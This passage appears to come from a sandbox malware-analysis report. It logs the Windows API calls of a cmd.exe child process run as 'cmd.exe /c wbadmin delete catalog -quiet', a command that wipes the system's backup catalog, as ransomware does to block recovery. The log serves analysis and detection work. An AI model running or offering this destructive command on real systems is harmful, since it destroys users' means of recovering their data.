GetProcessHeap () returned 0x590000 [0094.250] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe0) returned 0x5a33d0 [0094.253] GetConsoleTitleW (in: lpConsoleTitle=0x30f374, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.253] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f1fc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f2c4 | out: lpAttributeList=0x30f1fc, lpSize=0x30f2c4) returned 1 [0094.253] UpdateProcThreadAttribute (in: lpAttributeList=0x30f1fc, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f2bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f1fc, lpPreviousValue=0x0) returned 1 [0094.253] GetStartupInfoW (in: lpStartupInfo=0x30f1b8 | out: lpStartupInfo=0x30f1b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0094.262] CloseHandle (hObject=0x74) returned 1 [0094.262] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.262] GetProcessHeap () returned 0x590000 [0094.262] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5eb8 | out: hHeap=0x590000) returned 1 [0094.262] GetEnvironmentStringsW () returned 0x5a5eb8* [0094.262] GetProcessHeap () returned 0x590000 [0094.262] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a4078 [0094.262] FreeEnvironmentStringsW (penv=0x5a5eb8) returned 1 [0094.262] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0105.460] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x30f198 | out: lpExitCode=0x30f198*=0x80041014) returned 1 [0105.460] CloseHandle (hObject=0x78) returned 1 [0105.460] _vsnwprintf (in: _Buffer=0x30f2e0, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f1a4 | out: _Buffer="80041014") returned 8 [0105.460] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0105.461] GetProcessHeap () returned 0x590000 [0105.461] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4078 | out: hHeap=0x590000) returned 1 [0105.461] GetEnvironmentStringsW () returned 0x5a4078* [0105.461] GetProcessHeap () returned 0x590000 [0105.461] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a9560 [0105.461] FreeEnvironmentStringsW (penv=0x5a4078) returned 1 [0105.461] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0105.461] GetProcessHeap () returned 0x590000 [0105.461] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a9560 | out: hHeap=0x590000) returned 1 [0105.461] GetEnvironmentStringsW () returned 0x5a4078* [0105.461] GetProcessHeap () returned 0x590000 [0105.461] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a9560 [0105.461] FreeEnvironmentStringsW (penv=0x5a4078) returned 1 [0105.461] GetProcessHeap () returned 0x590000 [0105.461] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59fec8 | out: hHeap=0x590000) returned 1 [0105.461] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f1fc | out: lpAttributeList=0x30f1fc) [0105.461] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.461] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.462] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0105.462] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.462] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0105.463] SetConsoleInputExeNameW () returned 0x1 [0105.463] GetConsoleOutputCP () returned 0x1b5 [0105.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0105.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.463] exit (_Code=-2147217388) Process: id = "32" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3a30f000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "cmd.exe /c wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0xa98 [0093.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fdc4 | out: lpSystemTimeAsFileTime=0x32fdc4*(dwLowDateTime=0x25d0a520, dwHighDateTime=0x1d62227)) [0093.825] GetCurrentProcessId () returned 0xa90 [0093.825] GetCurrentThreadId () returned 0xa98 [0093.825] GetTickCount () returned 0x114e447 [0093.825] QueryPerformanceCounter (in: lpPerformanceCount=0x32fdbc | out: lpPerformanceCount=0x32fdbc*=21378056922) returned 1 [0093.827] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0093.827] __set_app_type (_Type=0x1) [0093.827] __p__fmode () returned 0x770331f4 [0093.827] __p__commode () returned 0x770331fc [0093.827] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0093.827] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0093.828] GetCurrentThreadId () returned 0xa98 [0093.828] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa98) returned 0x60 [0093.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.828] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0093.828] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32fd54 | out: phkResult=0x32fd54*=0x0) returned 0x2 [0093.852] VirtualQuery (in: lpAddress=0x32fd8b, lpBuffer=0x32fd24, dwLength=0x1c | out: lpBuffer=0x32fd24*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.853] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32fd24, dwLength=0x1c | out: lpBuffer=0x32fd24*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0093.853] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32fd24, dwLength=0x1c | out: lpBuffer=0x32fd24*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0093.853] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32fd24, dwLength=0x1c | out: lpBuffer=0x32fd24*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.853] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32fd24, dwLength=0x1c | out: lpBuffer=0x32fd24*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0093.853] GetConsoleOutputCP () returned 0x1b5 [0093.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0093.854] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0093.854] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.854] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0093.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.860] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0093.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.862] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0093.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0093.864] GetEnvironmentStringsW () returned 0x702008* [0093.864] GetProcessHeap () returned 0x6f0000 [0093.864] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xaca) returned 0x702ae0 [0093.864] FreeEnvironmentStringsW (penv=0x702008) returned 1 [0093.865] GetProcessHeap () returned 0x6f0000 [0093.865] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4) returned 0x700c40 [0093.865] GetEnvironmentStringsW () returned 0x702008* [0093.865] GetProcessHeap () returned 0x6f0000 [0093.865] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xaca) returned 0x7035b8 [0093.865] FreeEnvironmentStringsW (penv=0x702008) returned 1 [0093.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ecc4 | out: phkResult=0x32ecc4*=0x68) returned 0x0 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x0, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x1, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x1, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x0, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x40, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x40, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.866] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x40, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.866] RegCloseKey (hKey=0x68) returned 0x0 [0093.867] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ecc4 | out: phkResult=0x32ecc4*=0x68) returned 0x0 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x40, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x1, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x1, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x0, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x9, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x4, lpData=0x32ecd0*=0x9, lpcbData=0x32ecc8*=0x4) returned 0x0 [0093.867] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32eccc, lpData=0x32ecd0, lpcbData=0x32ecc8*=0x1000 | out: lpType=0x32eccc*=0x0, lpData=0x32ecd0*=0x9, lpcbData=0x32ecc8*=0x1000) returned 0x2 [0093.867] RegCloseKey (hKey=0x68) returned 0x0 [0093.868] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb03212 [0093.868] srand (_Seed=0x5eb03212) [0093.868] GetCommandLineW () returned="cmd.exe /c wbadmin delete catalog -quiet" [0093.868] GetCommandLineW () returned="cmd.exe /c wbadmin delete catalog -quiet" [0093.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.869] GetProcessHeap () returned 0x6f0000 [0093.869] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x210) returned 0x702008 [0093.869] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x702010, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0093.869] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.870] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.870] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.870] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0093.870] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0093.870] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0093.870] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0093.870] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0093.870] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0093.870] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0093.870] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0093.870] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0093.870] GetProcessHeap () returned 0x6f0000 [0093.870] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x702ae0 | out: hHeap=0x6f0000) returned 1 [0093.870] GetEnvironmentStringsW () returned 0x702220* [0093.870] GetProcessHeap () returned 0x6f0000 [0093.870] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xae2) returned 0x704b80 [0093.871] FreeEnvironmentStringsW (penv=0x702220) returned 1 [0093.871] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.871] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.871] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0093.871] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0093.871] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0093.871] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0093.871] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0093.871] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0093.871] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0093.871] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0093.872] GetProcessHeap () returned 0x6f0000 [0093.872] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x705670 [0093.872] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32fa90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.872] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32fa90, lpFilePart=0x32fa8c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32fa8c*="Desktop") returned 0x25 [0093.872] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.872] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f80c | out: lpFindFileData=0x32f80c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x701e88 [0093.873] FindClose (in: hFindFile=0x701e88 | out: hFindFile=0x701e88) returned 1 [0093.873] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f80c | out: lpFindFileData=0x32f80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x701e88 [0093.873] FindClose (in: hFindFile=0x701e88 | out: hFindFile=0x701e88) returned 1 [0093.873] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0093.873] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f80c | out: lpFindFileData=0x32f80c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1fdad3c0, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1fdad3c0, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x701e88 [0093.873] FindClose (in: hFindFile=0x701e88 | out: hFindFile=0x701e88) returned 1 [0093.874] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.874] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0093.874] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0093.874] GetProcessHeap () returned 0x6f0000 [0093.874] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x704b80 | out: hHeap=0x6f0000) returned 1 [0093.874] GetEnvironmentStringsW () returned 0x704090* [0093.874] GetProcessHeap () returned 0x6f0000 [0093.874] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xb36) returned 0x705ed0 [0093.875] FreeEnvironmentStringsW (penv=0x704090) returned 1 [0093.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.875] GetProcessHeap () returned 0x6f0000 [0093.875] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x705670 | out: hHeap=0x6f0000) returned 1 [0093.875] GetProcessHeap () returned 0x6f0000 [0093.875] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x400e) returned 0x706a10 [0093.876] GetProcessHeap () returned 0x6f0000 [0093.876] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x701e88 [0093.876] GetProcessHeap () returned 0x6f0000 [0093.876] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x706a10 | out: hHeap=0x6f0000) returned 1 [0093.876] GetConsoleOutputCP () returned 0x1b5 [0093.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0093.877] GetUserDefaultLCID () returned 0x409 [0093.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32fbd0, cchData=128 | out: lpLCData="0") returned 2 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32fbd0, cchData=128 | out: lpLCData="0") returned 2 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32fbd0, cchData=128 | out: lpLCData="1") returned 2 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0093.879] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0093.880] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0093.880] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0093.882] GetProcessHeap () returned 0x6f0000 [0093.882] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20c) returned 0x702d98 [0093.882] GetConsoleTitleW (in: lpConsoleTitle=0x702d98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.883] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0093.883] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0093.883] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0093.884] GetProcessHeap () returned 0x6f0000 [0093.884] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x400a) returned 0x706a10 [0093.884] GetProcessHeap () returned 0x6f0000 [0093.884] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x706a10 | out: hHeap=0x6f0000) returned 1 [0093.885] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0093.886] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0093.886] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0093.886] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0093.886] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0093.886] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0093.886] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0093.886] GetProcessHeap () returned 0x6f0000 [0093.886] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x702fb0 [0093.886] GetProcessHeap () returned 0x6f0000 [0093.886] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x703010 [0093.887] GetProcessHeap () returned 0x6f0000 [0093.887] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x703030 [0093.889] GetConsoleTitleW (in: lpConsoleTitle=0x32f8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.202] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0094.202] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0094.202] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0094.203] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0094.203] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0094.203] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0094.203] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0094.203] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0094.203] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0094.203] _wcsicmp (_String1="wbadmin", 